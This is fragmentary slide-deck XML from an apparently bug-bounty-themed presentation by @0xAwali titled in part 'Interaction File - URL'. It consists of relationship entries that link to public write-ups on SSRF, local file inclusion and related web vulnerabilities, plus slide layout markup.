Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/358119" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/398641" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/SirLeeroyJenkin/status/1254258307478556672" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@zain.sabahat/exploiting-ssrf-like-a-boss-c090dc63d326" TargetMode="External"/><Relationship Id="rId12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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=oxpbmUYCS4g" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://buer.haus/2016/04/18/esea-server-side-request-forgery-and-querying-aws-meta-data/" TargetMode="External"/><Relationship Id="rId7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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=oxpbmUYCS4g" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/bugbountywriteup/from-ssrf-to-aws-credentials-disclosure-64c51e1bf5dc" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/SpenGietz/status/1030099156012953600" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/bogdantcaciuc7/status/1278069163601334273" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@GeneralEG/escalating-ssrf-to-rce-f28c482eb8b9" TargetMode="External"/><Relationship Id="rId10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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Extension%20ASP" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/c0mr3x/status/1115481097234726912" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/adrien_jeanneau/status/1062460475387076608" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=oxpbmUYCS4g" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/hxzeroone/status/1161543248839622656" TargetMode="External"/><Relationship Id="rId7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hyperlink" Target="https://nirmaldahal.com.np/lfi-to-10-servers-pwn/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.deeplook.cl/2017/05/one-cloud-based-local-file-inclusion.html" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://incogbyte.github.io/pathtraversal/" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/bugbountywriteup/leveraging-lfi-to-rce-in-a-website-with-20000-users-129050f9982b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png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=oxpbmUYCS4g" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=oxpbmUYCS4g" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/pwnydaemons/status/1299147141550690304" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/thedawgyg/status/1224450254205927432" TargetMode="Externa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.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.jpg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/0xInfection/status/1148267196306427904" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/intigriti/status/1261285068062044160" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3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.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=oxpbmUYCS4g" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=oxpbmUYCS4g" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=oxpbmUYCS4g" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=oxpbmUYCS4g" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/128685" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14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.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=oxpbmUYCS4g" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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hyperlink" Target="https://twitter.com/pwnydaemons/status/1296244098215694336" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12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.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=oxpbmUYCS4g" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21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.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=oxpbmUYCS4g" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21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.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=oxpbmUYCS4g" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21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.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=oxpbmUYCS4g" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21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.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=oxpbmUYCS4g" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/thedawgyg/status/1224547692967342080" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10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.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=oxpbmUYCS4g" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21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.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=oxpbmUYCS4g" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21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.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=oxpbmUYCS4g" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21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.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=oxpbmUYCS4g" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/253558" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14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.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=oxpbmUYCS4g" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/payloadartist/status/1062248690679668736" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/61312" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/386292" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-c358fd5e249a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hyperlink" Target="https://medium.com/@frostnull/hi-guys-again-here-bringing-an-experience-to-share-with-you-as-usual-i-will-overshadow-some-f85a1d5a8d8c" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11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.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=oxpbmUYCS4g" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21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.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=D1S-G8rJrEk&amp;t=7s" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/cujanovic/SSRF-Testing#abusing-enclosed-alphanumerics" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/cujanovic/status/1012695418277265408" TargetMode="Externa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.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://2019.zeronights.ru/wp-content/themes/zeronights-2019/public/materials/4_ZN2019_Morozov_SSRF.pdf" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image52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.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/115748" TargetMode="Externa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.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://2019.zeronights.ru/wp-content/themes/zeronights-2019/public/materials/4_ZN2019_Morozov_SSRF.pdf" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image52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.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://2019.zeronights.ru/wp-content/themes/zeronights-2019/public/materials/4_ZN2019_Morozov_SSRF.pdf" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image52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3.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/intigriti/status/1248588962505113600" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40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3.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37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3.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://samcurry.net/reading-asp-secrets-for-17000/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://2019.zeronights.ru/wp-content/themes/zeronights-2019/public/materials/4_ZN2019_Morozov_SSRF.pdf" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image52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3.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.dropbox.com/sh/vkn2qsxz8i8o6oi/AADM2E52Ejnq5h6h580KCYLda?dl=0&amp;preview=Exercise_1_simple.pdf" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/HusseiN98D/status/1165632886218928128" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/486732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hyperlink" Target="https://medium.com/bugbountywriteup/bugbounty-journey-from-lfi-to-rce-how-a69afe5a0899" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11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3.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/115857" TargetMode="Externa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3.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.softwaresecured.com/2018/10/19/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6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3.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/381129" TargetMode="Externa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3.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/techfenix/ssrf-server-side-request-forgery-worth-4913-my-highest-bounty-ever-7d733bb368cb" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11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3.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@dPhoeniixx/vimeo-upload-function-ssrf-7466d8630437" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11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3.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/securitywall/exploiting-a-single-parameter-6f4ba2acf523" TargetMode="Externa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3.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/intigriti/status/1215258237773152257" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image48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3.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=gluSEBZpplQ" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=NWHOmYbLrZ0" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://rhynorater.github.io/CVE-2020-13379-Write-Up" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/878779" TargetMode="Externa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8.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nccgroup/singularity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14.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=Q0JG_eKLcws" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=y9-0lICNjOQ" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=oxpbmUYCS4g" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/53004" TargetMode="Externa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50.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/mark_valenzia/status/1258689477460889600" TargetMode="External"/><Relationship Id="rId5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hyperlink" Target="https://medium.com/bugbountywriteup/how-i-gained-access-to-sonys-database-f3ba08d0e035" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11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51.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/hackerscrolls/status/1337821232360808453" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10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61.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/0xAwali" TargetMode="External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hyperlink" Target="https://ngailong.wordpress.com/2019/12/19/google-vrp-ssrf-in-google-cloud-platform-stackdriver/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@win3zz/how-i-made-31500-by-submitting-a-bug-to-facebook-d31bb046e204" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/206894" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/411865" TargetMode="External"/><Relationship Id="rId10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hyperlink" Target="https://twitter.com/mdisec/status/1118510746277752832" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/Agarri_FR/status/1118509415286693889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hyperlink" Target="https://medium.com/@neerajedwards/reading-internal-files-using-ssrf-vulnerability-703c5706eefb" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@pratiky054/ssrf-to-read-local-files-and-abusing-the-aws-metadata-8621a4bf382" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/538771" TargetMode="External"/><Relationship Id="rId8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99999"/>
        </a:solid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40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="58375"/>
            <a:ext cx="4093800" cy="50847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00" name="Google Shape;200;p40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3731825" y="112700"/>
            <a:ext cx="880200" cy="8700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201" name="Google Shape;201;p40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4524900" y="132782"/>
            <a:ext cx="195600" cy="2064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40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4028100" y="2926150"/>
            <a:ext cx="5030100" cy="146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br>
              <a:rPr b="1" lang="en">
                <a:latin typeface="Lato"/>
                <a:ea typeface="Lato"/>
                <a:cs typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="3600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Mahmoud M.</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t> Awali</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en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1" lang="en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        </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black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@0xAwali</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="0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203" name="Google Shape;203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61200" y="4110576"/>
            <a:ext cx="727375" cy="56447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40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4584900" y="2571738"/>
            <a:ext cx="3916500" cy="511500"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                        https://www.company.com</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2400">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="205" name="Google Shape;205;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3868050" y="339175"/>
            <a:ext cx="5350200" cy="233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675">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="127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B5394"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>Interaction</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4800">
              <a:solidFill>
                <a:srgbClr val="0B5394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127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0">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>File - URL</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="7000">
              <a:solidFill>
                <a:srgbClr val="0B5394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206" name="Google Shape;206;p4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80400" y="2659950"/>
            <a:ext cx="491950" cy="33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99999"/>
        </a:solidFill>
